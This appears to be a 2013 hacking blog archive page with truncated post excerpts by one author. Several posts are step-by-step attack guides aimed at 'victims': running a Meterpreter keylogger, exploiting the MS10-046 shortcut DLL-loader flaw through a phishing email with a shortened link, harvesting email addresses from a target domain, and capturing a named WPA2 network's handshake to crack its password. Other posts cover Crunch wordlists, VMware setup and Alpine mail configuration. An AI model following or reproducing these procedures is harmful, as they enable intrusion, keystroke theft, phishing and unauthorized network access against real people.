Showing posts from April, 2013

[Video] Activate Keylogger Using Metasploit - PART 1

Today I will explain how to activate a keylogger using Metasploit. Note: we need a Meterpreter session before we can run the keylogger. After getting Meterpreter, we need to see which applications the victim is running. Check this now. Author: Hidemichi-Hiroyuki a.k.a. [H2]

Exploit ShortCut_Icon_DLL-Loader + [Video]

What should we answer when the victim asks: "Why should I go to your (the attacker's) IP address?" Well, we cannot answer such a simple question from the victim, but there are several things we can do during exploitation to convince the victim to go to the attacker's IP. In this exploitation I do not use MITM to lure the attacker.

Equipment:
1. msfconsole =>> Run the exploitation
2. goo.gl =>> URL shortener
3. alpine =>> Send the file to the victim

Planning example: I see a victim who has email active ==> then I send the DLLloader file to the victim ==> with vague enticements I convince the victim to click the URL we have shortened ==> when the victim opens that URL, we get a Meterpreter session. Victim ! DEATH ! !!

First step, run the exploit:
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit( ms1

Install VMware Workstation on Kali Linux

Please follow these steps to install VMware Workstation on Kali Linux. I have tried it and the results are very good =))

Download: please choose the version you need. Change the file permission to 775. Next, we execute the file:
root@[H2]:~# ./VMware-Workstation-Full-9.0.2-1031769.i386.bundle
It looks like the image below.

Next, choose Typical (recommended) and click Next. In the next section, I choose "I will install the operating system later". I want to install a Windows operating system, so I choose number one, "Microsoft Windows", and on the Version tab please choose your operating system. It looks like the image below.

In the next step, there are two options. Name: the original name of your operating system. Location: I choose the default VMware path, and then click Next. In the next step, set the disk size for the operating system. Look at the picture below: I give 35 GB and then I choose "Split virtual disk as a single fi

Harvest Email Collector

I think this is a simple way to get email addresses from a website, right? OK. Now open your fuckin Metasploit and then follow these commands:
msf > use auxiliary/gather/search_email_collector
I need to show the options:
msf auxiliary( search_email_collector ) > show options
I just need to use DOMAIN =))
msf auxiliary( search_email_collector ) > set DOMAIN [your target]
msf auxiliary( search_email_collector ) > exploit
Please wait for the scanning process to finish. Very simple, right? Author: Hidemichi-Hiroyuki a.k.a. [H2]

Generate Wordlists Using Crunch

On the Kali Linux operating system, Crunch is provided at version 3.4. Crunch helps us generate wordlists based on the criteria we want, for brute-forcing when auditing password strength. The output from Crunch can be placed and saved in various formats.

Full options:
-b  Maximum bytes to write per file, so using this option the wordlist to be created can be split into various sizes such as KB / MB / GB (must be used in combination with the "-o START" switch)
-c  Number of lines to write to the output file, must be used together with "-o START"
-d  Limits the number of consecutive identical characters (crunch v3.2)
-e  Specifies when crunch should stop early (crunch v3.1)
-f  Path to the charset.lst file to use, standard location is '/pentest/passwords/crunch/charset.lst', to be used in conjunction with the name of the desired charset list, such as 'mixalpha-numeric-space'
-i  In

Get Password WPA2

I think this is not a hard job =)) Please prepare the following equipment.

Equipment:
1. airmon-ng
2. airodump-ng
3. aireplay-ng
4. aircrack-ng

To meet the requirements above, I recommend using a Linux operating system; here I am using Kali Linux. Back to topic:

First step: enable monitor mode 'mon0'
root@[H2]:~# airmon-ng start wlan0
As seen at the bottom, mon0 mode has been enabled.

Step two: view the access points that are picked up
root@[H2]:~# airodump-ng mon0
Once the target access point appears, press Ctrl+C to stop. My target is:
64:70:02:F6:59:C4  -90   159    74   1   1  54e  WPA2 CCMP   PSK  ALAUDDINSYAH

Next step: get the target's handshake:
root@[H2]:~# airodump-ng -c [channel target] -w [--write] --bssid [bssid target] --ivs mon0
NOTE: Pay attention to the -w part, which is the same as --write. I gave it the name Anonymous [you are free to choose a name], ini na

Alpine Access E-mail

Today I think I will share how to configure Alpine and how to use Alpine to send mail ;)

Install Alpine from your console:
root@[H2]:~# apt-get install alpine
As seen in the image above, I have already installed it. Let's run Alpine:
root@[H2]:~# alpine
Next, do the configuration: choose SETUP / S, then choose Config.

Next step, set this section:
Personal Name = Your Name
User Domain = Your Domain
SMTP Server (for sending) = smtp.gmail.com:587/tls/user= Your Email
Inbox Path = {pop.gmail.com/pop3/ssl/novalidate-cert/user= Your Email }INBOX

Example:
Personal Name = Hidemichi-Hiroyuki
User Domain = gmail.com
SMTP Server (for sending) = smtp.gmail.com:587/tls/user= leo.script@gmail.com
Inbox Path = {pop.gmail.com/pop3/ssl/novalidate-cert/user= leo.sc